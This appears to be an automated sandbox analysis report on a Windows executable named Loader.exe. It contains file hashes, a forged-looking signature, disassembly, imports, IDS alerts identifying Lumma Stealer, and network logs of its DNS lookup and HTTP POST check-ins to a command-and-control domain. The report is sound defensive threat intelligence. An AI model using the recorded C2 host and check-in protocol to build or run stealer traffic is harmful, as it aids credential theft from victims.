                                                                                    Preview:Soon... Soon.....Soon... Soon.....Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon.....2Soon... Soon
                                                                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.722799047757642
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Loader.exe
                                                                                    File size:913'448 bytes
                                                                                    MD5:005896360be304a48e43d98bda83e12a
                                                                                    SHA1:305eb0232f73c8902427645b386810ec0efbb182
                                                                                    SHA256:169e2c86cc3b4953c7a52029f656bdac7fbe5207c7711c7640e312c0d2d62a0b
                                                                                    SHA512:3fdd2943e3a0a4493421bcc3b591ddd9cad6c3e0239df6a4a1311e4ac41a2a04c534692553a308f0c5897df1b9587ab10388a88a400b6033bcc564c53b5ae89f
                                                                                    SSDEEP:24576:g5hXYUUk5QcL8q2T7rFVcKcL8q2T7rFVcKNt:g5BYUUkec4qsJVc4qsJVz
                                                                                    TLSH:DF15F1027681C1B3DC7321B358AAD76A593EE610475269CF47880EBEDFA53C19E31B36
                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....og.................&...`.......n............@.......................... ......x'....@.....................................<..
                                                                                    Icon Hash:90cececece8e8eb0
                                                                                    Entrypoint:0x416e80
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows cui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x676FE8B9 [Sat Dec 28 12:02:01 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:0
                                                                                    File Version Major:6
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:41ad976bfe47a7c2ff95e863461ff36e
                                                                                    Signature Valid:false
                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                    Error Number:-2146869232
                                                                                    Not Before, Not After
                                                                                    • 13/01/2023 00:00:00 16/01/2026 23:59:59
                                                                                    Subject Chain
                                                                                    • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                    Version:3
                                                                                    Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                    Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                    Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                    Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                    Instruction
                                                                                    call 00007FBE3525635Ah
                                                                                    jmp 00007FBE352561BDh
                                                                                    mov ecx, dword ptr [00446C40h]
                                                                                    push esi
                                                                                    push edi
                                                                                    mov edi, BB40E64Eh
                                                                                    mov esi, FFFF0000h
                                                                                    cmp ecx, edi
                                                                                    je 00007FBE35256356h
                                                                                    test esi, ecx
                                                                                    jne 00007FBE35256378h
                                                                                    call 00007FBE35256381h
                                                                                    mov ecx, eax
                                                                                    cmp ecx, edi
                                                                                    jne 00007FBE35256359h
                                                                                    mov ecx, BB40E64Fh
                                                                                    jmp 00007FBE35256360h
                                                                                    test esi, ecx
                                                                                    jne 00007FBE3525635Ch
                                                                                    or eax, 00004711h
                                                                                    shl eax, 10h
                                                                                    or ecx, eax
                                                                                    mov dword ptr [00446C40h], ecx
                                                                                    not ecx
                                                                                    pop edi
                                                                                    mov dword ptr [00446C80h], ecx
                                                                                    pop esi
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 14h
                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                    xorps xmm0, xmm0
                                                                                    push eax
                                                                                    movlpd qword ptr [ebp-0Ch], xmm0
                                                                                    call dword ptr [00441868h]
                                                                                    mov eax, dword ptr [ebp-08h]
                                                                                    xor eax, dword ptr [ebp-0Ch]
                                                                                    mov dword ptr [ebp-04h], eax
                                                                                    call dword ptr [00441824h]
                                                                                    xor dword ptr [ebp-04h], eax
                                                                                    call dword ptr [00441820h]
                                                                                    xor dword ptr [ebp-04h], eax
                                                                                    lea eax, dword ptr [ebp-14h]
                                                                                    push eax
                                                                                    call dword ptr [004418B8h]
                                                                                    mov eax, dword ptr [ebp-10h]
                                                                                    lea ecx, dword ptr [ebp-04h]
                                                                                    xor eax, dword ptr [ebp-14h]
                                                                                    xor eax, dword ptr [ebp-04h]
                                                                                    xor eax, ecx
                                                                                    leave
                                                                                    ret
                                                                                    mov eax, 00004000h
                                                                                    ret
                                                                                    push 00448318h
                                                                                    call dword ptr [00441890h]
                                                                                    ret
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    mov al, 01h
                                                                                    ret
                                                                                    push 00030000h
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x416080x3c.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x4cb.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xdca000x2628.bss
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b0000x2724.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x3d3000x18.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x35e380xc0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x417b40x170.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x3243a0x326003d568903d800df25407b478aab50e7c2False0.4952407723325062data6.4159305075437345IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x340000x103bc0x10400e046b86a8b6c55309652f0a94104f5cfFalse0.4735877403846154DOS executable (COM)5.260359318934046IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x450000x3ae00x2c0041abedb3cd61d6efee59d0f1e4be6075False0.27885298295454547data5.101110177853289IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .tls0x490000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x4a0000x4cb0x600ee43461d834889b465299afba9ae6c0cFalse0.3756510416666667data3.140177596477353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x4b0000x27240x280064004383e008202ce37a7536feb48147False0.748046875data6.515813867534955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    .bss0x4e0000x49e000x49e001a8d1a8db5b3ead7b3b3c8c24dd3cefaFalse1.000333782783418data7.999356190346704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .bss0x980000x49e000x49e001a8d1a8db5b3ead7b3b3c8c24dd3cefaFalse1.000333782783418data7.999356190346704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0x4a0a00x3a4dataEnglishUnited States0.44849785407725323
                                                                                    RT_MANIFEST0x4a4440x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                    DLLImport
                                                                                    KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                    ADVAPI32.dllEqualSid
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-12-29T23:37:01.191785+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450006104.21.80.1443TCP
                                                                                    2024-12-29T23:37:01.685688+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450006104.21.80.1443TCP
                                                                                    2024-12-29T23:37:01.685688+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450006104.21.80.1443TCP
                                                                                    2024-12-29T23:37:02.210145+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450007104.21.80.1443TCP
                                                                                    2024-12-29T23:37:03.001796+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450007104.21.80.1443TCP
                                                                                    2024-12-29T23:37:03.001796+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450007104.21.80.1443TCP
                                                                                    2024-12-29T23:37:04.143444+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450011104.21.80.1443TCP
                                                                                    2024-12-29T23:37:05.112215+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450011104.21.80.1443TCP
                                                                                    2024-12-29T23:37:05.699139+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450012104.21.80.1443TCP
                                                                                    2024-12-29T23:37:06.916870+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450013104.21.80.1443TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 29, 2024 23:37:00.747745037 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:00.747792959 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:00.747872114 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:00.751040936 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:00.751056910 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.191709995 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.191785097 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.195540905 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.195549965 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.195789099 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.247692108 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.258747101 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.258768082 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.258862019 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.685707092 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.685806036 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.685863018 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.693841934 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.693861008 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.693871975 CET50006443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.693876982 CET44350006104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.763164043 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.763192892 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:01.763295889 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.763957024 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:01.763969898 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:02.210011005 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:02.210144997 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:02.212038040 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:02.212053061 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:02.212285995 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:02.213447094 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:02.213471889 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:02.213521957 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001636982 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001694918 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001718998 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001743078 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001765013 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001785994 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.001790047 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001804113 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001813889 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.001843929 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001854897 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.001874924 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001902103 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001919031 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.001933098 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.001946926 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.044576883 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.044589043 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.085930109 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.085967064 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.085990906 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.086013079 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.086023092 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.086056948 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.086103916 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.086255074 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.086484909 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.086502075 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.086514950 CET50007443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.086524010 CET44350007104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.702605963 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.702651978 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:03.702950001 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.703263044 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:03.703278065 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:04.143346071 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:04.143444061 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:04.537707090 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:04.537749052 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:04.538225889 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:04.539697886 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:04.539869070 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:04.539891958 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:04.539989948 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:04.539998055 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:05.112226009 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:05.112361908 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:05.112416029 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:05.112571955 CET50011443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:05.112593889 CET44350011104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:05.262597084 CET50012443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:05.262655020 CET44350012104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:05.262747049 CET50012443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:05.263053894 CET50012443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:05.263070107 CET44350012104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:05.699054003 CET44350012104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:05.699139118 CET50012443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:05.700438976 CET50012443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:05.700448036 CET44350012104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:05.700826883 CET44350012104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:05.702270031 CET50012443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:05.702398062 CET50012443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:05.702428102 CET44350012104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:06.150734901 CET44350012104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:06.150844097 CET44350012104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:06.150968075 CET50012443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:06.151138067 CET50012443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:06.151163101 CET44350012104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:06.483160973 CET50013443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:06.483177900 CET44350013104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:06.483267069 CET50013443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:06.483612061 CET50013443192.168.2.4104.21.80.1
                                                                                    Dec 29, 2024 23:37:06.483632088 CET44350013104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:06.916812897 CET44350013104.21.80.1192.168.2.4
                                                                                    Dec 29, 2024 23:37:06.916870117 CET50013443192.168.2.4104.21.80.1
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 29, 2024 23:37:00.729943037 CET5713553192.168.2.41.1.1.1
                                                                                    Dec 29, 2024 23:37:00.742854118 CET53571351.1.1.1192.168.2.4
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 29, 2024 23:37:00.729943037 CET192.168.2.41.1.1.10xe599Standard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 29, 2024 23:37:00.742854118 CET1.1.1.1192.168.2.40xe599No error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                    Dec 29, 2024 23:37:00.742854118 CET1.1.1.1192.168.2.40xe599No error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                    Dec 29, 2024 23:37:00.742854118 CET1.1.1.1192.168.2.40xe599No error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                    Dec 29, 2024 23:37:00.742854118 CET1.1.1.1192.168.2.40xe599No error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Dec 29, 2024 23:37:00.742854118 CET1.1.1.1192.168.2.40xe599No error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Dec 29, 2024 23:37:00.742854118 CET1.1.1.1192.168.2.40xe599No error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Dec 29, 2024 23:37:00.742854118 CET1.1.1.1192.168.2.40xe599No error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                    • fancywaxxers.shop
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.450006104.21.80.14437888C:\Users\user\Desktop\Loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-29 22:37:01 UTC264OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: fancywaxxers.shop
                                                                                    2024-12-29 22:37:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-12-29 22:37:01 UTC1129INHTTP/1.1 200 OK
                                                                                    Date: Sun, 29 Dec 2024 22:37:01 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=vg81o09415qc2sog62tb6rrk0h; expires=Thu, 24 Apr 2025 16:23:40 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dY1OXRY6zB96WjMCtXJkYUDmfALzTYNtRyEwXdhvrGudoUju9H3xbkLRkxbgngXCDczDVopff6jK37jwIj8t2vnitmQ%2BYfz%2Ffm02QCMvHmAX%2BIUvfvl0LZY9H7cp7WtsTHPkcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f9d45b32f978c0f-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1942&rtt_var=748&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1442687&cwnd=223&unsent_bytes=0&cid=bbf82a1b3b0d70a7&ts=504&x=0"
                                                                                    2024-12-29 22:37:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                    Data Ascii: 2ok
                                                                                    2024-12-29 22:37:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.450007104.21.80.14437888C:\Users\user\Desktop\Loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-29 22:37:02 UTC265OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 53
                                                                                    Host: fancywaxxers.shop
                                                                                    2024-12-29 22:37:02 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73 73 74 74 26 6a 3d
                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@youngesstt&j=
                                                                                    2024-12-29 22:37:02 UTC1127INHTTP/1.1 200 OK
                                                                                    Date: Sun, 29 Dec 2024 22:37:02 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=pma7rc8637gpr3nd2a057ug8km; expires=Thu, 24 Apr 2025 16:23:41 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
